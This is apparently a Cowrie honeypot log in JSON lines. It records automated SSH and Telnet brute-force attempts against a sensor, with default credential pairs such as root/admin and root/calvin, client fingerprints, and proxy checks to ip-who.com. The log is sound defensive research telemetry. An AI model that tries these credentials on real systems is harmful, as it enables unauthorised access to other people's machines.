{"eventid":"cowrie.login.failed","username":"testftp","password":"testftp","message":"login attempt [testftp/testftp] failed","sensor":"my-vps","timestamp":"2025-08-26T21:13:22.407755Z","src_ip":"212.227.235.229","session":"3b102c5a22e1"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:23.750885Z","src_ip":"212.227.235.229","session":"3b102c5a22e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43980,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e625dd5bde5","protocol":"ssh","message":"New connection: 212.227.235.229:43980 (1.2.3.4:22) [session: 4e625dd5bde5]","sensor":"my-vps","timestamp":"2025-08-26T21:13:33.568052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:13:33.764896Z","src_ip":"212.227.235.229","session":"4e625dd5bde5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:13:33.828959Z","src_ip":"212.227.235.229","session":"4e625dd5bde5"}
{"eventid":"cowrie.login.success","username":"root","password":"htpcguides","message":"login attempt [root/htpcguides] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:13:35.841879Z","src_ip":"212.227.235.229","session":"4e625dd5bde5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:13:36.100592Z","session":"4e625dd5bde5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:13:36.357339Z","src_ip":"212.227.235.229","session":"4e625dd5bde5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:36.615155Z","src_ip":"212.227.235.229","session":"4e625dd5bde5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60422,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bfb9c88e9b5","protocol":"ssh","message":"New connection: 212.227.235.229:60422 (1.2.3.4:22) [session: 2bfb9c88e9b5]","sensor":"my-vps","timestamp":"2025-08-26T21:13:51.822749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:13:51.860651Z","src_ip":"212.227.235.229","session":"2bfb9c88e9b5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:13:53.097540Z","src_ip":"212.227.235.229","session":"2bfb9c88e9b5"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:13:54.065332Z","src_ip":"212.227.235.229","session":"2bfb9c88e9b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:13:54.464896Z","session":"2bfb9c88e9b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:13:55.304047Z","src_ip":"212.227.235.229","session":"2bfb9c88e9b5"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:13:55.646174Z","src_ip":"212.227.235.229","session":"2bfb9c88e9b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60444,"dst_ip":"1.2.3.4","dst_port":22,"session":"09f6787286be","protocol":"ssh","message":"New connection: 212.227.235.229:60444 (1.2.3.4:22) [session: 09f6787286be]","sensor":"my-vps","timestamp":"2025-08-26T21:13:57.409662Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:13:57.438654Z","src_ip":"212.227.235.229","session":"09f6787286be"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:13:57.688628Z","src_ip":"212.227.235.229","session":"09f6787286be"}
{"eventid":"cowrie.login.failed","username":"kelly","password":"kelly","message":"login attempt [kelly/kelly] failed","sensor":"my-vps","timestamp":"2025-08-26T21:13:59.209803Z","src_ip":"212.227.235.229","session":"09f6787286be"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:01.461880Z","src_ip":"212.227.235.229","session":"09f6787286be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55106,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9b4240fd5d0","protocol":"ssh","message":"New connection: 212.227.235.229:55106 (1.2.3.4:22) [session: a9b4240fd5d0]","sensor":"my-vps","timestamp":"2025-08-26T21:14:02.391450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:02.393079Z","src_ip":"212.227.235.229","session":"a9b4240fd5d0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:02.660813Z","src_ip":"212.227.235.229","session":"a9b4240fd5d0"}
{"eventid":"cowrie.login.success","username":"root","password":"calvin","message":"login attempt [root/calvin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:14:03.629297Z","src_ip":"212.227.235.229","session":"a9b4240fd5d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T21:14:03.944549Z","session":"a9b4240fd5d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T21:14:04.200812Z","src_ip":"212.227.235.229","session":"a9b4240fd5d0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:04.575571Z","src_ip":"212.227.235.229","session":"a9b4240fd5d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55122,"dst_ip":"1.2.3.4","dst_port":22,"session":"27b4c3747acc","protocol":"ssh","message":"New connection: 212.227.235.229:55122 (1.2.3.4:22) [session: 27b4c3747acc]","sensor":"my-vps","timestamp":"2025-08-26T21:14:05.610179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:05.611956Z","src_ip":"212.227.235.229","session":"27b4c3747acc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:14:05.870951Z","src_ip":"212.227.235.229","session":"27b4c3747acc"}
{"eventid":"cowrie.login.failed","username":"vyos","password":"vyos","message":"login attempt [vyos/vyos] failed","sensor":"my-vps","timestamp":"2025-08-26T21:14:08.077607Z","src_ip":"212.227.235.229","session":"27b4c3747acc"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:09.417825Z","src_ip":"212.227.235.229","session":"27b4c3747acc"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":47494,"dst_ip":"1.2.3.4","dst_port":23,"session":"861b4dd727dc","protocol":"telnet","message":"New connection: 176.65.149.186:47494 (1.2.3.4:23) [session: 861b4dd727dc]","sensor":"my-vps","timestamp":"2025-08-26T21:14:17.137608Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:14:17.175621Z","src_ip":"176.65.149.186","session":"861b4dd727dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:14:17.273821Z","src_ip":"176.65.149.186","session":"861b4dd727dc"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T21:14:17.275135Z","src_ip":"176.65.149.186","session":"861b4dd727dc"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T21:14:17.276117Z","src_ip":"176.65.149.186","session":"861b4dd727dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43770,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b87eec952dc","protocol":"ssh","message":"New connection: 212.227.235.229:43770 (1.2.3.4:22) [session: 1b87eec952dc]","sensor":"my-vps","timestamp":"2025-08-26T21:14:22.441135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:14:22.741614Z","src_ip":"212.227.235.229","session":"1b87eec952dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32776,"dst_ip":"1.2.3.4","dst_port":22,"session":"57964aca245d","protocol":"ssh","message":"New connection: 212.227.235.229:32776 (1.2.3.4:22) [session: 57964aca245d]","sensor":"my-vps","timestamp":"2025-08-26T21:14:29.383596Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:14:29.384808Z","src_ip":"212.227.235.229","session":"57964aca245d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33150,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3cfc9fd7560","protocol":"ssh","message":"New connection: 212.227.235.229:33150 (1.2.3.4:22) [session: d3cfc9fd7560]","sensor":"my-vps","timestamp":"2025-08-26T21:14:29.493452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:14:29.494280Z","src_ip":"212.227.235.229","session":"d3cfc9fd7560"}
